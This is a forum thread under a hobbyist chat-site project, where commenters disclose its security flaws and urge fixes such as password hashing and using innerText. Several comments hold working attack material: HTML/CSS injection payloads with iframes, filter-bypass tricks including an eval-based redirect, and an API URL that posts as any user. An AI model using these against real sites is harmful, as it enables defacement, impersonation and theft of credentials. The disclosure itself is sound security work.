Share your repls and programming experiences

← Back to all posts
Chit Chat - A server based social media site
GameDev46 (207)

What is Chit Chat?

Chit Chat is a website where you can chat to a larger community of people and watch as your messages are permanently saved to my custom node.js server!

Why is it useful?

Chit Chat is useful as you can ask and talk to a larger community of friendly users and if anything ever goes bad, just simply click the report button on the messages and it will get sent to me!

How did I do it?

As I said before, I used a custom node.js server to save and load messages and who they were sent by, and as for the accounts, all the passwords and encoded so nobody is going to hack into your account!

Remember to upvote if you liked the project!!

Please open the project up in a separate tab otherwise it will take longer to load the comments up, and nobody likes waiting XD!

Also, please by patient with the server as it can be slightly slow at times, so just give it a sec as it has to fetch a lot of data!

And remember to upvote if you like it, it only takes a second to do it! Hope you guys enjoy! Bye! =D

Comments
hotnewtop
YodaCode (116)

Cool, but not cool. Here's what needs to be fixed:

1. XSS issues

Anyone can add CSS or JavaScript that runs with a message. If you try loading it right now, it won't load, because I added styles that hid every element.

2. Passwords are public

This is a really big issue. Either fix the passwords, or warn people that their passwords are not only unencrypted and un-hashed, but they're also public for anyone to see.

3. Grow up


How would I feel? I would feel like I shouldn't have XSS issues and storing passwords publicly without people knowing. This is actually a security issue and needs to be taken seriously. We're not ruining your life, and if your entire life is just making programs that have security issues and then calling people 5/yr olds, then you need to get a life.

Edit: 4. You can browse any website in an iframe using this message:

<link rel="stylesheet" href="https://static.yodacode.repl.co/xss2.css"><iframe id="d" src="https://geekprank.com/fbi-warning/"></iframe>

Edit: 5. Stop lying about encrypted passwords


Not only are you hiding the fact that our passwords aren't secure, but you're lying about it.

RahulChoubey1 (172)

@YodaCode where are the passwords? I want to see if mine's stored.

YodaCode (116)

@RahulChoubey1 I think he hid them, but it's still possible to get to them.

GameDev46 (207)

@YodaCode Ok, look. I don’t want this to turn into a mass argument as that would benefit no one! So I would like to thank you for all these things that need to be added and I will try my best to do that 😀! The passwords and encoded and stored in a private database and I am working on trying to make them even more secure. I have also added an xss filter a few days ago and it is now impossible to break the website with xss or css. But thank you @YodaCode for all the help!

YodaCode (116)

@GameDev46

it is now impossible to break the website with xss or css.

I'd have to disagree with you on that one. Try pasting this into the chat box:

<link href="https://static.yodacode.repl.co/none.css" rel="stylesheet" type="text/css">
YodaCode (116)

Look: My point is, don't allow raw HTML parsing. Ever. If you want markdown, make a markdown system. Don't take raw data from users and distribute it to other people. I'm not saying you're a bad developer or whatever, I just want you to take people's security seriously. People may have used their actual Replit username and password and have their account details leaked. People could have used https://grabify.link and an <iframe> to get people's IP addresses. Any number of things could have been done just because you forgot to safely store passwords or safely handle user data. Not to mention the fact that your buddies are trying to get me banned from Replit because I raised awareness about the fact that this repl is unsafe. I tried to execute code that wasn't malicious just to see if it would work, and I tried to report my findings so that you could fix it. There are a number of things I could have done that were much worse, but I was only trying to help. Here's what you should do:

1. Be honest

Tell people that you made a mistake and try and fix it. Don't lie about unsecure passwords or try and cover up your mistakes.

2. Hash passwords

You should never need user passwords except for when checking that a user had a correct password, which is why you should hash them. (And make sure they're hashed on the server, as well.)

3. Use innerText instead of innerHTML

It may lose markup capabilities, but I'd rather have to use plaintext than get redirected to a tracker/virus/p*rn website.

There. That's all I have to say. Now I'll stop bugging you if you listen and do the above. When something gets 128 upvotes on the Replit talk pages, a lot of people have used it. That means a lot of peoples' security is at risk, and even more peoples' security will be put at risk if you don't fix this.

YodaCode (116)

@GameDev46 Still thinks his filter is working just fine:

GameDev46 (207)

@YodaCode Thank you for the feedback! I am trying my best to keep users data safe and realize that this will probably be a problem in the future. I already has a basic filter when it comes to running JavaScript and already have a link and JavaScript blocker. I even filter anything starting with http. The way the filter works is if it detects ANY unallowed chars or strings in the message, then the entire thing is innerText, otherwise it is innerHTML

RolandJLevy (1083)

@GameDev46 can you let me know which xss filter you are using?

YodaCode (116)

@GameDev46 THIS JUST IN

New way to bypass XSS filter.


  • Use // instead of https://
  • Style things with style = "" instead of style=""
  • Use built-in classes to mess up your message
  • onkeyup, onkeydown, onkeypress smh
YodaCode (116)

@GameDev46 No; that's what you're missing.

Just use innerText.

There are so many more methods I could try if I had time. This is a loophole that allows anyone to manipulate the site if they put in enough time. Please do these things, it doesn't hurt you at all:

StonksAreRising (29)

Instead of bullying @GameDev46 How about we help him?

GameDev46 (207)

@StonksAreRising I have a database now, so no one can see the passwords and usernames again XD

GameDev46 (207)

@StonksAreRising Yes XD Do you know who is doing it?

StonksAreRising (29)

@GameDev46
Nope! And this is where mods come in!

NathanTodd2 (17)

@GameDev46 got it https://replit.com/@NathanTodd2/chit-chat-haked click the link logged in console hope you can fix this
edit: you could use some code form this https://replit.com/@Crosis/chat
P.S. not sure if you can see this Crosis might of made it a private repl i am an editor

Yimmee (31)

@StonksAreRising i was just gonna say mods and use sign in with replit

ParrotDev (21)

@GameDev46 could I be a mod? Is there signup? also @StonksAreRising hello I have not talked to you in a while

GameDev46 (207)

@ParrotDev Because I had to move all the logins to a database it is hard to do, but I will try my best to XD

StonksAreRising (29)

@ParrotDev Woah hey parrot its been a long time!

StonksAreRising (29)

@GameDev46
Can Walmart become a mod too?

RolandJLevy (1083)

@StonksAreRising reading the comments, I don't think anyone has been bullying @GameDev46. @YodaCode has taken the time to point out some important issues and help him resolve them. Receiving feedback and advice is part of being a developer

YodaCode (116)

@RolandJLevy Thank you for understanding. These people are trying to get me kicked off of Replit when I'm just trying to protect people's personal data like passwords, IP addresses, location data, and more. This is a serious issue and the fact that @GameDev46 doesn't even acknowledge it is scary.

RolandJLevy (1083)

@YodaCode I can see that you're only trying to help. Anyone trying to get you kicked off replit has misunderstood your intention. Passwords should always be hashed with something like bcrypt and stored in a database. That's basic common sense. Also, not having any protection against XSS is another basic mistake.

I've been misunderstood in the past because people interpret help as a criticism. But let's face it, when you're working as a developer in a team, your code is going to constantly be questioned and scrutinised - and we know that's a good thing! How else do we learn and grow?

I hope @GameDev46 can learn from this experience and appreciate that your concern is coming from a good place 👍

GameDev46 (207)

@YodaCode I try my best to keep users safe, and I admit that when I first put Chit Chat out, the defences were awful 🤣!! I very sorry that people are trying to get you kicked though and hope you aren’t as you are showing me how to improve Chit Chat and make it more friendly for others!!

GameDev46 (207)

@RolandJLevy I will definitely learn from this 😂!! As this was my first project to use backend scripting (an express server) I had never really touched upon defences before!! But thankfully the community helped me to defend the system better!! 😀

RolandJLevy (1083)

@GameDev46 I think this is great for your first project. I'm glad to hear that you're being open to feedback. There are a lot of experienced people out there who can give really helpful advice. Keep up the good work! 😀

YodaCode (116)

First, @RolandJLevy, thanks. I agree and hope that everyone can learn from this experience. My only issue is that @GameDev46 still uses innerHTML and doesn't hash passwords. He "encrypts" them (he actually encodes them; he think's encoding and encrypting are the same) and still isn't fixing it. When using innerHTML, there is always something else that can be exploited, and it's only a matter of time until someone takes advantage of it when lots of people are online and grab IP addresses and location information from everyone. @GameDev46, would you want that happening to you? Your IP address exposed, redirected to a NSFW website, and your password taken? Oh, and, by the way, blocking certain JavaScript keywords like location or window won't work, because you can just eval('loca' + 'tion.replace(["h","t","t","p","s",":","/","/"].join("") + "google.com");').

GameDev46 (207)

@YodaCode First, I do know the difference between encoding and encrypting 😂! And have just replaced it so it uses innerText instead of innerHTML!!

RolandJLevy (1083)

@YodaCode thanks for your message. On a positive note, your comments and feedback are teaching people some important aspects of software development. It's up to them whether they listen to you or not, and in the long run they will find out the seriousness of the consequences when not taking security seriously. Thanks for caring 🙌

XCode101 (33)

A social media site???!?!?!?!
Not to lie but the password storage is bad.
Got To:
https://test-1.thecoder12398.repl.co
Here is a list of passwords and usernames from this site.

XCode101 (33)

@deadartz
It is just a small overview.

GameDev46 (207)

@Thecoder12398 I know that the storage isn’t that safe, but what is so wrong with you that you would waste your time writing it out on a text file! I spent a lot of time on this chat app and you people just walk all over it! How would you feel if you spent hours building a site like this and every 5 seconds some annoying 5 year old would come and ruin it all?!!

XCode101 (33)

@GameDev46
Sorry for ruining your project. It was not my intent to make you feel bad. The code is buggy and was meant to make it sure that you know that the site might be hacked. Sorry again.

GameDev46 (207)

@Thecoder12398 In that case it is fine XD It is just all the hackers that get me down as they find it funny to spam messages on my account! Which is why I have had to deactivate my account LOL! Thank you for understanding! =D

deadartz (18)

@GameDev46 "you're ruining my life by hacking my website on replit!!" 😥

GameDev46 (207)

@deadartz I just changed the logins to be put in a database! Good luck now LOL

cjmatthy09 (52)

@GameDev46 lifecycle of bugs in gamedev's programs:

  1. bug found
  2. bug used
  3. someone talks about it in repl talk
  4. gamedev rants and says it ruins their life when it doesnt
  5. bug fixed
GameDev46 (207)

@cjmatthy09 I am so close to no bugs now XD

cjmatthy09 (52)

there will always be some, they probably just arent discovered, or you cant fix it @GameDev46

GameDev46 (207)

@cjmatthy09 Yes, but hopefully all the hackers won't be able to hack the server anymore XD

YodaCode (116)

@Thecoder12398 Cool, but not cool. Here's what needs to be fixed:

1. XSS issues

Anyone can add CSS or JavaScript that runs with a message. If you try loading it right now, it won't load, because I added styles that hid every element.

2. Passwords are public

This is a really big issue. Either fix the passwords, or warn people that their passwords are not only unencrypted and un-hashed, but they're also public for anyone to see.

3. Grow up


How would I feel? I would feel like I shouldn't have XSS issues and storing passwords publicly without people knowing. This is actually a security issue and needs to be taken seriously. We're not ruining your life, and if your entire life is just making programs that have security issues and then calling people 5/yr olds, then you need to get a life.

Edit: 4. You can browse any website in an iframe using this message:

<link rel="stylesheet" href="https://static.yodacode.repl.co/xss2.css"><iframe id="d" src="https://geekprank.com/fbi-warning/"></iframe>
StonksAreRising (29)

Bug found!
If you put your username as a special character you are not able to send messages!

GameDev46 (207)

@StonksAreRising I will take a look, thank you! =D

StonksAreRising (29)

@GameDev46
you said html still works for profile but its probably only console but I cannot access console on dumb school chromebook

brourbeinsus (2)

@StonksAreRising if you can’t use console on chrome book then here: javascript:(function%20()%20%7B%20var%20script%20=%20document.createElement('script');%20script.src=%22//cdn.jsdelivr.net/npm/eruda%22;%20document.body.appendChild(script);%20script.onload%20=%20function%20()%20%7B%20eruda.init()%20%7D%20%7D)();
It’s a bookmarklet with a dev tools clone

GameDev46 (207)

@StonksAreRising As in it still runs the HTML code in your chat boxes on users profiles

brourbeinsus (2)

Whoever made testbot needs to make it so it doesn’t spam, “bot sleeping for 60 seconds” all the time, as it is spamming the main chat, it also shouldn’t say command not found because it interferes with other bots like mine, SusBot. I tried typing in a command for my bot, and TestBot said that the command was not found. Just putting it out there.

CosmicBear (6)

@brourbeinsus TestBot also interferes with my bot but keep in mind that TestBot was the first bot built.

ImJustChillin (0)

@brourbeinsus Thanks for letting me know! Let me know if I should change anything else. I changed the request interval to 2 seconds. I also made it so it doesn't send messages when sleeping or a command is not found.

Sorry, I haven't really worked on Test Bot for a couple of weeks besides changing some minor things here and there. Sorry about that!

PlaTalented (2)

You can easily make a program that sends get requests in order to spam the site. Looks like someone did it with some random decimals...

StonksAreRising (29)

@PlaTalented
yeah I mentioned that in the chat

candies (156)

@GameDev46 add a feature where you can ban people by ip

mollthecoder (37)

Why can't I use mollthecoder as my username? Is one of the characters not a letter?

Yimmee (31)

Wait, you encrypt passwords? i thought you were supposed to hash them, so its supposedly impossible to reverse it.

deadartz (18)

@Yimmee, They can be printed in plaintext anyways if you know what you're doing on this site; the security is not good at all lol

Yimmee (31)

@deadartz wait why is this reported?
and i lost you immediately

deadartz (18)

@Yimmee The passwords of the website are sent in plaintext to the client

deadartz (18)

@Yimmee because the developer doesn't hash them and the decryption method is stored on the client

deadartz (18)

@Yimmee Passwords are also in plaintext in his replit; https://replit.com/@GameDev46/MainServer

Yimmee (31)

@deadartz and, WHY WOULD THE PASSWORD BE SENT TO THE CLIENT??????

deadartz (18)

@Yimmee because the client is the one that confirms if the password is correct obviously smh

deadartz (18)

@Yimmee see right here

        if (decodedPass == password.value) {
          sessionStorage.setItem('username', username);

          return;
        }
Yimmee (31)

@deadartz @‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎GameDev46 hash ple........ nevermind. i dont know a useful package anyway..................................

deadartz (18)

@Yimmee well he should rewrite the login + backend if he really wanted it to be secure

Yimmee (31)

@deadartz isnt sessionStorage used to store the sid??????????
i mean, you dont NEED it, but......... whatever. most hacks happen remoteley anyway.

Yimmee (31)

@deadartz well, im going to try and do this my self then. and hopefully make it more secure.

deadartz (18)

@Yimmee seesionstorage is used to store the username around these parts partner B)

deadartz (18)

@Yimmee try, use replit's database and not a plaintext file; and hash <3

Yimmee (31)

@deadartz so hashing itself is not secure enough? you know what if that then im just gonna lean on replits' .env hiding. and no hash.
and it says "session" storage. probably not used for session but its not my fault its,,,, the inventor of js's.

deadartz (18)

@Yimmee hashing is secure enough; but you should never have it easy for people to get passwords even if they're hashed

sessionstorage can really be used for anything; not commonly used for usernames, that would be localstorage; sessionstorage would contain stuff like "LoginID"

Yimmee (31)

@deadartz but if it's secure enough, why cant i make it easy to get a hashed password??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

Yimmee (31)

@Yimmee Its not like im gonna accept hashed passwords for passwords

deadartz (18)

@Yimmee because its still technically someone's password? and some hash algorithms do end up having security flaws so it'd be better if you DONT just let anyone see them??

deadartz (18)

@Yimmee hashing is just setting a password to decrypt basically; if they get the hashed passwords and they brute dictionary attack it; if you used a common word you're screwed

Yimmee (31)

@deadartz oakay so .env isnt safe either?

deadartz (18)

@Yimmee iirc replit changed env so you cant use it but they have their own environment, env is only as safe as your account is

Yimmee (31)

@deadartz (i know this is a little mean, but honestly, if this happens,) thats the users fault. mostly.

deadartz (18)

@Yimmee as a developer storing sensitive data, it is your job to keep it as secure as possible; thats why you hash it and store it in a database thats hard to get to?

Yimmee (31)

@deadartz its linked to my google acc, and my google password is ##########, so i think thats safe. no common words.

Yimmee (31)

thank you I finally know a secure way to leave passwords in the [email protected]

Yimmee (31)

@deadartz i have no idea how to use the replit db, and, REPLIT IS THE ONLY PEOPLE THAT SEES IT ANYWAYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY!
for the db its the same thing. someone can get my pw, change my server code, and console.log the db'd passwords. its hashed but db is safe too.

deadartz (18)

@Yimmee well yeah but i'd rather have a db than just text files or env alot easier to work with

Yimmee (31)

i also dk how to use a normal db [email protected]

Yimmee (31)

@deadartz dont worry im not using .env. im using using secrets

Infiniti20 (16)

@Yimmee I just turned 13. bruh

Infiniti20 (16)

@Yimmee lol its ok. you don't have to use express, but for any secure database, it's almost a must-have

Yimmee (31)

@Infiniti20 i have no idea about databases. i hear of it, but never used one. i honestly don't plan to start,,,,,,,,,,,,,,,,,,,

DigiGaming (1)

Bug!

If you click on your profile in the main page, then it will say that you can PM yourself.

GameDev46 (207)

@DigitalSharkYT I am still working on the private messaging system XD

Yimmee (31)

@DigitalSharkYT you can send an sms to yourself too. its free storage why are you relieving us of like 1mb of storage

PixiGem (100)

@GameDev46, Why ya throwing the F-Word!

I reported you in the website and this post

GameDev46 (207)

@HyperDev100 That isn’t me, that is a hacker

PixiGem (100)

@GameDev46 Like I believe you? it shows if the name is taken in the login page

GameDev46 (207)

@HyperDev100 As in they hacked into my account!

PixiGem (100)

@GameDev46 no they didn't, I tried it myself, they created another account called " GameDev46". they added a space at the beginning to get a similar name.
edit: Like repl.it warns you for any spaces in the name while we create an account, you can add that feature in your website

brourbeinsus (2)

@HyperDev100 there used to be a script you could paste into the console that allowed you to easily hack into accounts, but I’m pretty sure it’s fixed now

poetaetoes (316)

@HyperDev100 yes there is a site where everyone's password is saved

CosmicBear (6)

@HyperDev100 The hackers did actually hack his account

PythonLuv (17)

The login page seems to be broken

GameDev46 (207)

@PythonLuv I had to shut down the server to make it more well prepared against hackers! All back up now though! =D

nbbcsf (23)

@GameDev46 :( hash the password, not encrypt!

deadartz (18)

Love that you can just send a request to the API and it posts as any user

https://mainserver.gamedev46.repl.co/api/add?user=GameDev46&message=sheeeeesh

GameDev46 (207)

@deadartz Good luck with that now!! XD

JEFFJEFFJEF (3)

dont feel safe it ask for my password

tankerguy1917 (178)

@JEFFJEFFJEF You could just make a test account so you can see if you can trust it, and there wouldn't be to much that could be done with your password anyway, unless you use one that you use for an important account login or something else like that.

GameDev46 (207)

@tankerguy1917 Nobody is really going to hack your account XD

Dunce (65)

@JEFFJEFFJEF Why? As long as you don't use the same password as you use for other things it's fine.

RolandJLevy (1083)

Hi @GameDev46, I think your app is good. Have you thought about organising your files by putting your .js, .html and .css files in separate folders?

Also, I recommend organising your code into classes, like this: https://www.w3schools.com/js/js_classes.asp

It will improve the quality of your code.

LOLguy1123455 (24)

suddenly the buttons become unclickable

120FPS (0)

Could i be verified @GameDev46?

120FPS (0)

Could i be verified GameDev46?

ArranJohnston (0)

40 32 205 161 194 176 32 205 156 202 150 32 205 161 194 176 41

A1PHA1 (10)

I can stop it from crashing all the time, invite me to the server repl.

A1PHA1 (10)

@GameDev46 i know some code that really helped with Blabbr, one of my own chat apps, so i think it may work here too.

A1PHA1 (10)

@GameDev46 add some code that helped with blabbr, a chat app of my own

A1PHA1 (10)

Can you invite me to the server repl? I know how to make it stop crashing with message spam, i did it on Blabbr, a chat app.

RahulChoubey1 (172)

Hold on… how are there so many vulnerabilities? Could someone pentest my site?

DEANKASOZI (1)

Damn this is well made

RahulChoubey1 (172)

My username is excusemewut

RahulChoubey1 (172)

It keeps saying "Server is Unresponsive" or somethin